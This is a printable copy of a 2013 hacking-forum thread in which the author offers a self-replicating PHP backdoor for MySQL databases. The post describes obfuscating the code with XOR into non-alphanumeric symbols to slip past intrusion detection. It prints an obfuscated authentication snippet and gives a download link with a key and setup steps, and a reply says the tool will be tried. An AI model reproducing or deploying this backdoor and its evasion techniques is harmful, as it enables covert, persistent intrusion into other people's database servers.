![]() |
|
Semi-nonalphanumeric & Self-replicating PDO-based Database Backdoor - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: Semi-nonalphanumeric & Self-replicating PDO-based Database Backdoor (/Thread-Semi-nonalphanumeric-Self-replicating-PDO-based-Database-Backdoor) |
Semi-nonalphanumeric & Self-replicating PDO-based Database Backdoor - Keeper - 10-20-2013 ![]() Introduction: I've written a self-spreading backdoor script with nothing more but symbols (meaning without alpha or numeric values) for databases. Currently, it includes only MySQL db servers but I'll enlarge the scope of its abilities in the near future. Features of the backdoor:
Future features:
Construction: The backdoor consists of two main files. The script itself and the authentication form. Aside from that, the replication copies are with a forced .php extension, of course and with an indefinite amount of replications. The others are just .txt files for the storage of their locations. The entire backdoor is written in PDO (PHP Data Objects) due to the deprecation of some of the functions for MySQL in PHP5.5+ and security measures. It is semi-nonalphanumeric due to the fact that I have NANed only the MySQL queries in case there is a sort of detection or an IDS. However, the entire authentication system and SQL execution script are completely non-alphanumeric with the exception of foreach() and if() loops. During the process of coding, I have made a separate project to handle my inputs and convert alpha and numeric values to symbols using the XOR operation in PHP. That can be witnessed on my website - http://keeperax.netai.net/Antagonism/NANGenerator.php. There is additional obfuscation within the declaration/definition of variables using Kanji symbols, Hepburn romanization system and particially alt-codes. A small preview (part of the authentication system) is presented below: PHP Code: <?php $_¸=(":"^"_").('-'^'_').('-'^'_').("/"^"@").('-'^'_').'_'.('-'^'_').(":"^"_").((','^'~')^'"').("/"^"@").('-'^'_').("+"^"_").("@"^")").("."^"@").(']'^':');$_¸¸=(("."^"`")^"~");$_¸($_¸¸);$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");$_=('*'^'_').(','^'_').(":"^"_").('-'^'_').("."^"@").(">"^"_").('-'^'@').(":"^"_");$___=('*'^'_').(','^'_').(":"^"_").('-'^'_');$____=((','^'~')^'"').(">"^"_").(','^'_').(','^'_');$_=${$__}[$___];$__=${$__}[$____];$_…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.('*'^'_').(','^'_').(':'^'_').('-'^'_').(('-'^'|')^'`');$__…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.((','^'~')^'"').(">"^"_").(','^'_').(','^'_').(('-'^'|')^'`');$__=("#"^"|").('-'^'~').('%'^'`').('-'^'~').('-'^'~').(')'^'`').(("]"^":")^"(").("."^"`");$__……=("@"^"(").(":"^"_").(">"^"_").("$"^"@").(":"^"_").('-'^'_');$___……=("@"^")").(','^'_').(","^"`").("/"^"@").(']'^':').(']'^':').(":"^"_").("$"^"@");$_∙=(','^'_').(":"^"_").(','^'_').(','^'_').("@"^")").("/"^"@").("."^"@").'_'.(','^'_').("+"^"_").(">"^"_").('-'^'_').("+"^"_");$_∙();$_∙∙=(","^"`").("/"^"@").('<'^'_').(">"^"_").("+"^"_").("@"^")").("/"^"@").("."^"@").':'." ".('='^'_').(">"^"_").('<'^'_').('+'^'@').("$"^"@").("/"^"@").("/"^"@").('-'^'_').'.'.((','^'~')^'"').("@"^"(").((','^'~')^'"');if(isset($__)&&isset($_)){if($__==$__…&&$_==$_…){$__……($_∙∙);${$__}[$___……] = ("+"^"_").('-'^'_').('*'^'_').(":"^"_");}}?>For the most of the code, there are several scripts and jQuery plugins for the smooth listing of the databases and the database menu. The requests are not asynchronous though - I didn't feel like meddling AJAX as well so.. The password generator is complete Javascript and the alphanumerical values are just extended strings so make sure you freeze the generator once you get a password because it's gonna overload your browser after running on for a while. I think the rest is all self-explanatory. How to get it? Link: https://mega.co.nz/#!UBlVTCSS Key: fOGKLRWOsf-ZdfErl5KplmsCM6cMXdf_s_WoQv_OWxE Note: Before you upload it make sure you edit the PDO constants with the appropriate credentials. The default one is: 'root' without a password. RE: Semi-nonalphanumeric & Self-replicating PDO-based Database Backdoor - XWorm - 11-16-2013 Very interesting, a self made tool .. I will give it a try |